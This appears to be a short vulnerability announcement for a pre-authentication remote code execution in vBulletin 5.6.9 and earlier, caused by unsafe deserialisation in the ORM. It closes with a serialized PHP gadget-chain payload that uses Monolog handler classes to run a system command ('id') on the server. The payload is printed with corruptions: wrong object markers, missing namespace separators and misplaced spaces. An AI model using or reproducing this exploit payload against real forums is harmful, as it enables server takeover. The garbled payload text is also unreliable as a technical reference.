vBulletin <= 5.6.9: Pre-authentication Remote Code Execution

The Ambionics Security team discovered a pre-authentication remote code execution in vBulletin 5.6.9.

According to the Ambionics researcher, this pre-auth Remote Code Execution vulnerability at vBulletin was reported in August of 2022  to the concerned team. Exploiting this unserialize() bug was tricky, as vBulletin classes are not deserialisable.

The bug was due to improper handling of non-scalar data in the ORM, which led to arbitrary deserialisation. The bug was patched in 5.6.9 PL1, 5.6.8 PL1, and 5.6.7 PL1 but no CVE was issued.

Exploit for the vBulletin <= 5.6.9: Pre-authentication Remote Code Execution

a:2:{i:0;0:27:"googlelogin_vendor_autoload":0:{}i:1;0:32:"MonologHandlerSyslogUdpHandler":1:{s:9:"*socket";0:29: "MonologHandlerBufferHandler":7:{s:10:"*handler";r:4;s:13: "*bufferSize";i:-1; s:9:"*buffer";a:1:{i:0;a:2:{i:0;s:2:"id";s:5:"level";N;}}s:8:"*level";N;s:14:"*initialized"; b: 1;s:14: "*bufferLimit";i:-1;s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}}